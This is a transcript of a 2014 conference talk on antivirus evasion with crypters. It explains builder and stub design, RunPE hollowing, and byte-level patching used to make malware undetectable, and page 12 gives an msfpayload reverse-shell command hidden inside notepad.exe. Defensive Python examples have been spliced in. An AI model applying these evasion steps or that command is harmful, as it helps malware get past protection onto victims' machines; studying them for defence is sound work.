AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14

Upload: incide

Post on 09-Jun-2015


DESCRIPTION

AntiVirus Evasion Techniques: Use of Crypters. Presentation 2k14 at the MundoHackerDay Congress. Kevin Mitnick was also there ;)

TRANSCRIPT

Page 1

AntiVirus Evasion: Use of Crypters

Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14

Page 2

whoami

ncd:~ apasamar$ whoami
apasamar
[email protected]
@apasamar a.k.a. brajan

ncd:~ apasamar$ cat apasamar.cv
Electrical Engineer and Master in Information Security
Co-founder of INCIDE: Electronic Evidence Experts
Forensics / Expert Witness Reports
Incident Response
IT Security Auditors and Consultants

ncd:~ apasamar$ rm apasamar.cv

Page 3

what is this about...

• Introduction
• AVs: how they work
• Malware types and AV detection
• Evasion techniques
  • Self-encryption, polymorphism, obfuscation, compression
• Crypters
  • types
  • stub
  • FUD stub
• Modding techniques
• Resources

Page 4

introduction

• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• AV companies —> Detect MALWARE
• Bad guys: make MALWARE undetectable

Page 5

introduction

• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• AV Companies —> MALWARE Detection
• BAD GUYS: Undetect MALWARE

Page 6

introduction

Bad guys' objective:

Page 7

introduction

Bad guys' objective:

Page 8

AV howto

• AntiVirus scans binaries on the HARD DISK
• They do not SCAN MEMORY, only the binaries that 'start' the running processes
• Scan for signatures: binary sequences in the AV database
• Look for malicious techniques (heuristics): APIs, functions, XOR, etc.
• Sandbox (partial execution): look for decryption routines, etc.
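To make the signature step on this slide concrete, here is an added Python example (written for this transcript, not code from the talk or from any AV product) of the byte-signature matching the slide describes: hex patterns with single-byte wildcards are compiled to a bytes regex and run over a buffer, reporting which signature matched at which offset. The signature names, the patterns and the two sample buffers are constructed for the demo.

```python
import re

# Constructed sample signature database for this example. Signatures are
# space-separated hex bytes; "??" stands for one wildcard byte. Nothing here
# comes from a real AV vendor's database.
SIGNATURES = {
    "Demo.Pattern.A": "E8 ?? ?? ?? ?? 83 C4 04",            # call rel32 ; add esp, 4
    "Demo.Pattern.B": "68 65 6C 6C 6F 20 77 6F 72 6C 64",   # the string "hello world"
}


def compile_signature(hex_sig):
    """Compile a hex signature with '??' wildcards into a compiled bytes regex."""
    parts = []
    for tok in hex_sig.split():
        if tok == "??":
            parts.append(b".")                       # any single byte
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    # DOTALL makes '.' match 0x0A too, which a byte matcher must do.
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buffer, signatures=SIGNATURES):
    """Return [(signature_name, offset)] for every occurrence of every signature,
    sorted by offset. Overlapping occurrences of one signature are not reported
    because finditer resumes after the end of each match."""
    hits = []
    for name, sig in signatures.items():
        pattern = compile_signature(sig)
        for m in pattern.finditer(buffer):
            hits.append((name, m.start()))
    return sorted(hits, key=lambda hit: hit[1])


# Constructed sample buffers: one carrying both patterns, one carrying neither.
SAMPLE_HIT = (
    b"\x90" * 16                                     # padding
    + b"\xe8\x10\x00\x00\x00\x83\xc4\x04"             # Demo.Pattern.A at offset 16
    + b"hello world"                                 # Demo.Pattern.B at offset 24
    + b"\xc3"
)
SAMPLE_CLEAN = bytes(range(16)) * 4


if __name__ == "__main__":
    for label, buf in (("sample_hit", SAMPLE_HIT), ("sample_clean", SAMPLE_CLEAN)):
        print(label, scan(buf))
```

The wildcard bytes are what let one signature cover a call instruction regardless of its target; the price is that the signature also fires on any legitimate code with the same shape, which is why the heuristics and sandbox steps on the same slide exist alongside plain pattern matching.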

Page 9

AV howto

[Diagram: EXECUTABLE on DISK -> RAM -> PROCESS? Which of these does the AV SCAN?]

Page 10

AV howto

• AV analysis process: [diagram]

Page 11

AV howto

• Recommended: "Abusing File Processing in Malware Detectors for Fun and Profit" (2012), Suman Jana and Vitaly Shmatikov, The University of Texas at Austin

Page 12

AV howto

• Metasploit Framework (Rapid7)
  • Community Edition:
    • msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
  • Pro Edition:
    • Generate AV-evading Dynamic Payloads

Page 13

types of malware and AV detection

• Commercial SPY programs (whitelisted, signed):
  • e-blaster
  • 007
  • perfect keylogger
  • ...

Page 14

types of malware and AV detection

• Newly created malware:
  • LOW detection (NO known signatures)
  • possible heuristic detections

Page 15

types of malware and AV detection

• Existing malware (very well known; signature and heuristic detections):
  • trojans (BiFrost, PoisonIvy, CyberGate, SpyNet, DarkComet)
  • downloaders
  • password stealers
  • reverse shells

Page 16

How can we make malware that is already detected by AV undetectable?

• Crypters:
  • Software that lets you encrypt ANY MALWARE, making it undetectable to AV.

Page 17

crypters

Page 18

builder / stub

• Builder:
  • Responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE
• Stub:
  • Its mission is to decrypt and run the ENCRYPTED MALWARE

Page 19

builder / stub

[Diagram: the CRYPTER (Builder) takes the DETECTED MALWARE, encrypts it (XOR, RC4, ...) and joins it to the STUB; the result is STUB + ENCRYPTED MALWARE, stored as exe/dll or as a resource]

Page 20

builder / stub

[Diagram: STUB | splitter | CRYPTED MALWARE, and STUB | splitter | CRYPTED MALWARE | KEY]

A resource section can always be used

Page 21

builder / stub

• Crypter types:
  • ScanTime
  • RunTime

Page 22

stub

• ScanTime

[Diagram: STUB + CRYPTED MALWARE -> DETECTED MALWARE on the HARD DISK; AV]

Page 23

stub

• RunTime

[Diagram: STUB + ENCRYPTED MALWARE on the HARD DISK; DETECTED MALWARE in RAM; AV]

Page 24

stub

• STUB modules:
  • Decrypt routine
  • RunPE (Dynamic Forking) routine

Page 25

RunPE or Dynamic Forking

[Diagram: CreateProcess (CREATE_SUSPENDED) -> PROCESS 1; GetThreadContext -> PEB in EBX, EP in EAX, BaseAddress 1 at PEB+8; ReadFile; WriteProcessMemory -> PROCESS 2 (BaseAddress 2, EP 2); SetThreadContext; ResumeThread]
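The API sequence on this slide is also the defender's detection opportunity: a process created with CREATE_SUSPENDED whose creator then writes into its memory, replaces its thread context and resumes it is the RunPE / process-hollowing shape. The following Python is an added example written for this transcript (not the speaker's code or any product's rule) that correlates those calls per (parent, child) pair over an API trace. The trace line format, the pids and the image paths are constructed for the demo; the CREATE_SUSPENDED value 0x4 is the documented CreateProcess flag.

```python
import re

CREATE_SUSPENDED = 0x00000004   # CreateProcess dwCreationFlags bit (documented Win32 value)

# Constructed API-trace line format used only by this example (not a real sensor's output):
#   "<time> pid=<parent> <Api>(key=value, key=value, ...)"
LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) (?P<api>\w+)\((?P<args>.*)\)$")
ARG_RE = re.compile(r"(\w+)=([^,]+)")

# Stages of the RunPE chain reached for one (parent pid, child pid) pair.
CREATED, WRITTEN, CONTEXT_SET = 1, 2, 3


def parse_line(line):
    """Return (ts, parent_pid, api, args) or None for a line not in the trace format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = {k: v.strip() for k, v in ARG_RE.findall(m["args"])}
    return m["ts"], int(m["pid"]), m["api"], args


def detect_runpe(lines):
    """Flag every chain CreateProcess(CREATE_SUSPENDED) -> WriteProcessMemory ->
    SetThreadContext -> ResumeThread issued by one parent against one child.
    Returns [(parent_pid, child_pid, image_path)]."""
    state = {}      # (parent, child) -> (stage reached, image path of the suspended child)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        _, pid, api, args = rec
        if "child_pid" not in args:
            continue                      # ReadFile and similar calls do not target the child
        key = (pid, int(args["child_pid"]))
        if api.startswith("CreateProcess"):
            if int(args.get("flags", "0"), 16) & CREATE_SUSPENDED:
                state[key] = (CREATED, args.get("image", "?"))
            continue
        if key not in state:
            continue                      # child was not created suspended by this parent
        stage, image = state[key]
        if api == "WriteProcessMemory" and stage >= CREATED:
            state[key] = (WRITTEN, image)
        elif api == "SetThreadContext" and stage >= WRITTEN:
            state[key] = (CONTEXT_SET, image)
        elif api == "ResumeThread":
            if stage >= CONTEXT_SET:
                alerts.append((pid, key[1], image))
            del state[key]                # the chain ends once the child is running
    return alerts


# Constructed trace: a RunPE-shaped sequence (pid 4120), a process started suspended
# and simply resumed (pid 3300), and a write into a normally created child (pid 2100).
SAMPLE_TRACE = r"""
10:00:01.001 pid=4120 CreateProcessW(image=C:\Windows\System32\svchost.exe, flags=0x00000004, child_pid=5208)
10:00:01.002 pid=4120 GetThreadContext(child_pid=5208)
10:00:01.003 pid=4120 ReadFile(handle=0x1a4, bytes=24576)
10:00:01.004 pid=4120 WriteProcessMemory(child_pid=5208, addr=0x00400000, size=24576)
10:00:01.005 pid=4120 SetThreadContext(child_pid=5208)
10:00:01.006 pid=4120 ResumeThread(child_pid=5208)
10:00:02.000 pid=3300 CreateProcessW(image=C:\Windows\System32\notepad.exe, flags=0x00000004, child_pid=5310)
10:00:02.001 pid=3300 ResumeThread(child_pid=5310)
10:00:03.000 pid=2100 CreateProcessW(image=C:\Windows\System32\cmd.exe, flags=0x00000000, child_pid=5400)
10:00:03.001 pid=2100 WriteProcessMemory(child_pid=5400, addr=0x00600000, size=16)
""".splitlines()


if __name__ == "__main__":
    for parent, child, image in detect_runpe(SAMPLE_TRACE):
        print(f"RunPE-style hollowing: pid {parent} wrote into suspended child {child} ({image})")
```

Only the full chain raises an alert: a launcher that creates a child suspended and resumes it untouched, or a debugger that writes into a process it did not create suspended, both fall through, which keeps the rule usable on a busy host. The ReadFile step from the slide is deliberately ignored because it carries no child handle and any process reads files.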

Page 26

FUD

• Target: FUD Stub (Fully UnDetectable)
  • From source code
  • From binary code
• How?
  • MODDING

Page 27

modding source code

• Manually or using obfuscation tools:
  • Function replacement (SPLIT, ...)
  • Replacement and obfuscation of functions/strings/variables. Use of rot13 or hex encoding
  • Encryption: RC4 and XOR are very well known by AV
    • Alternatives: TEA, DES, etc.
  • Alternative RunPE routines
  • Fake APIs
  • TLB (Type Library file)
  • Trash code

Page 28

modding binary file

• Techniques:
  • Dsplit/AvFucker
  • SignatureFucker
  • Hexing
  • RIT
  • XOR and variants
  • Tips

Page 29

modding binary file

• We have to undetect the STUB; the BUILDER is only a tool used at home, not in the wild
• First of all, FIND THE AV SIGNATURES:
  • Simple signatures
  • Multiple signatures
  • Heuristic signatures

Page 30

modding binary file

• Recommended: "Bypassing Anti-Virus Scanners" (2012), InterNOT Security Team

Page 31

modding binary file

• What if we use a simple encryption/decryption routine inside the STUB?

[Diagram: stub.exe with EP and Signatures -> stub.exe with OLD EP, Signatures encrypted, and a NEW EP at the decryption routine]

Page 32

modding binary file

• ORIGINAL STUB: MULTIPLE AV SCAN

Do NOT use VirusTotal for these scans or your STUB samples will be sent to the AV companies :(

Page 33

modding binary file

• ENCRYPTION ROUTINE
  • NEW EP
  • INSERT ROUTINE
  • .text SECTION
    • from offset 1050
    • to the Import Table

Page 34

modding binary file

• ENCRYPTION ROUTINE AT NEW EP
  • used only to encrypt the .text section (used once)

Set a breakpoint here, after the encryption routine

Page 35

modding binary file

• DECRYPTION AND EXECUTION AT NEW EP
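Pages 31 to 35 describe encrypting the stub's .text section and moving the entry point to a decryption routine. From the defensive side those changes leave structural traces in the PE headers that need no signature at all: a code section whose bytes have near-random entropy, a section that is both writable and executable (required to decrypt code in place), and an entry point outside .text. The following Python is an added example written for this transcript (not the speaker's tooling or any scanner's code); it builds two constructed PE32 images with minimal headers, one plain and one shaped like the modified stub, parses the headers back and runs those three checks. The 7.0 bits/byte threshold is an assumption chosen for the demo, and the section contents are stand-in byte patterns, not real code.

```python
import math
import random
import struct

# Section characteristics from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
ENTROPY_THRESHOLD = 7.0        # bits per byte; cut-off assumed for this demo, not a vendor value


def shannon_entropy(data):
    """Bits of entropy per byte: 8.0 for uniform random bytes, 0.0 for a constant."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_pe32(sections, entry_rva):
    """Constructed minimal PE32 image for the demo (DOS, COFF, optional and section
    headers plus raw section data); sections is [(name, rva, raw_bytes, characteristics)]."""
    file_align, e_lfanew, opt_size = 0x200, 0x40, 224
    align = lambda x: (x + file_align - 1) // file_align * file_align
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                       # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)  # ImageBase, SectionAlignment, FileAlignment
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    table, body, raw_ptr = b"", b"", align(headers_len)
    for name, rva, raw, chars in sections:
        raw_size = align(len(raw))
        table += struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), len(raw), rva,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    headers = dos + b"PE\0\0" + coff + bytes(opt) + table
    return headers.ljust(align(headers_len), b"\0") + body


def parse_pe32(data):
    """Return (entry_rva, sections) read back from the headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        f = struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)
        name, vsize, rva, raw_size, raw_ptr, chars = f[0], f[1], f[2], f[3], f[4], f[9]
        sections.append({"name": name.rstrip(b"\0").decode(errors="replace"), "rva": rva,
                         "size": max(vsize, raw_size), "data": data[raw_ptr:raw_ptr + raw_size],
                         "chars": chars})
    return entry_rva, sections


def assess(data):
    """Structural indicators of an encrypted, self-decrypting image as (indicator, section) pairs."""
    entry_rva, sections = parse_pe32(data)
    findings, ep_section = [], None
    for s in sections:
        if s["rva"] <= entry_rva < s["rva"] + s["size"]:
            ep_section = s
        if s["chars"] & IMAGE_SCN_CNT_CODE and shannon_entropy(s["data"]) > ENTROPY_THRESHOLD:
            findings.append(("high-entropy-code", s["name"]))     # code bytes that look random
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(("writable-executable", s["name"]))   # needed to decrypt code in place
    if ep_section is None:
        findings.append(("entry-outside-sections", None))
    elif ep_section["name"] != ".text":
        findings.append(("entry-not-in-text", ep_section["name"]))  # a new EP in a stub section
    return findings


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Constructed section contents: a repeating byte pattern stands in for plain code,
# deterministic pseudo-random bytes stand in for encrypted code.
PLAIN_CODE = b"\x55\x8b\xec\x33\xc0\x5d\xc3\x90" * 512
_rng = random.Random(7)
ENCRYPTED_CODE = bytes(_rng.randrange(256) for _ in range(4096))
DATA = b"config=1\0" * 32

CLEAN_IMAGE = build_pe32([(".text", 0x1000, PLAIN_CODE, RX), (".data", 0x2000, DATA, RW)], 0x1000)
MODDED_IMAGE = build_pe32([(".text", 0x1000, ENCRYPTED_CODE, RX | IMAGE_SCN_MEM_WRITE),
                           (".data", 0x2000, DATA, RW),
                           (".stub", 0x3000, b"\x90" * 64, RX)], 0x3000)

if __name__ == "__main__":
    print("clean :", assess(CLEAN_IMAGE))
    print("modded:", assess(MODDED_IMAGE))
```

Packers and legitimate self-extracting installers trip the same indicators, so in practice these are triage signals that route a file to the sandbox step from page 8 rather than verdicts on their own; the point is that encrypting the bytes a signature matched does not hide the fact that something in the image is encrypted.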

Page 36

modding binary file

• MODIFIED STUB: MULTIPLE AV SCAN

16 AVs KO

Page 37

modding binary file

• Techniques:
  • Dsplit/AvFucker
  • SignatureFucker
  • Hexing
  • RIT
  • XOR and variants
  • Tips

Page 38

modding binary file

• DSplit:

[Diagram: Header + EXE body, cut at 1000 bytes, 2000 bytes, 3000 bytes, ... N×1000 bytes]

Page 39

modding binary file

• AvFucker:

[Diagram: Header + EXE body, with successive 1000-byte windows overwritten with 0000000000]

Page 40

modding binary file

• RIT Technique
  • Find out the AV signature
  • If the signature is located in instruction code —> break the flow
  • Jump to another address (a hole in the section where you can write your code)
  • Execute the pending instructions
  • Return/jump to the appropriate instruction

Page 41

modding binary file

• XOR Technique
  • Find out the AV signature
  • Apply XOR with any value, e.g. 22, to a byte
  • Modify the EP or jump to your hole
  • Apply XOR 22 to the modified byte
  • Return/jump to the appropriate instruction

Page 42

modding binary file

Detected bytes (EP):

XOR of the detected bytes:

New EP (XORs and jump to original EP):

Page 43

other techniques

• Add fake APIs
• Hex string edits
• Move/change function calls
• Change function call type: by name/by offset
• Insert the detected DLL function into the stub code

Page 44

resources

• http://www.indetectables.net
• http://www.udtools.net
• http://www.masters-hackers.info
• http://www.level-23.biz/
• http://www.corp-51.net/
• http://www.underc0de.org

Page 45

Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
[email protected]
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Tel./Fax. +34 932 546 277 / +34 932 546 314

ANY QUESTIONS?